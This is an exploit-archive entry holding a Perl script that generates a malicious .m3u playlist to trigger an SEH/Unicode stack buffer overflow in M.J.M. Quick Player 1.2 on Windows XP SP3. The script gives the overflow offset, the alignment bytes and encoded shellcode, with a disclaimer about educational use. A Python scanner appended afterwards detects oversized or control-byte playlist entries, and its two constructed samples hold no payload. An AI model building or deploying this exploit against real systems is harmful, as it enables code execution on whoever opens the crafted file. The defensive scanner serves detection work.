Topic : Quick Player 1.2 Stack BOF Exploit (XP SP3)
ExploitAlert : 7613
Credit : corelanc0d3r
Date : 28.12.2009
Exploit Code :
# [*] Vulnerability : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released : dec 28th, 2009
# [*] Type : local and remote code execution
# [*] OS : Windows
# [*] Product : M.J.M. Quick Player
# [*] Versions affected : 1.2 (Latest version is not vulnerable)
# [*] Download from : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method : SEH / Unicode
# [*] Tested on : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d"; #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";
my $morestuff="D" x 111;
# I think this will execute calc :-)
my
$shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIA
J11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0Q
U48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";
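
A defensive check for the file format this exploit abuses, added here as an example and not part of the original exploit or its author's code: it scans an .m3u playlist for entries that are long enough to reach the 529-byte offset used above, that contain long filler runs, or that carry control bytes. The thresholds, the function name `scan_m3u` and both sample playlists are assumptions constructed for illustration.

```python
import re

MAX_ENTRY_LEN = 260   # assumed limit (MAX_PATH-sized); tune for your environment
MAX_RUN = 64          # assumed tolerance for one byte repeated back to back
_RUN = re.compile(rb"(.)\1{%d,}" % MAX_RUN, re.DOTALL)


def scan_m3u(data: bytes):
    """Return [(line_number, [reasons])] for playlist entries worth quarantining."""
    findings = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(b"#"):   # blank lines and #EXT directives
            continue
        reasons = []
        if len(line) > MAX_ENTRY_LEN:
            reasons.append(f"entry is {len(line)} bytes (limit {MAX_ENTRY_LEN})")
        if _RUN.search(line):
            reasons.append("long run of a single repeated byte")
        # Tab is tolerated; other control bytes have no place in a path or URL.
        if any((b < 0x20 and b != 0x09) or b == 0x7F for b in line):
            reasons.append("control bytes in entry")
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed sample: an ordinary playlist with a stream URL and a local path.
BENIGN = (b"#EXTM3U\n#EXTINF:215,Artist - Track\n"
          b"http://radio.example.test/stream.mp3\n"
          b"C:\\Music\\track01.mp3\n")

# Constructed sample: same header and URL prefix as the file above, followed
# by inert filler and two control bytes. It contains no payload.
OVERSIZED = b"#EXTM3U\n\nHTTP://" + b"A" * 700 + b"\x01\x02\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, scan_m3u(sample) or "clean")
```

Run it at a mail or web gateway, or over download directories, before playlists reach a media player; non-ASCII bytes are deliberately not flagged so UTF-8 file names pass.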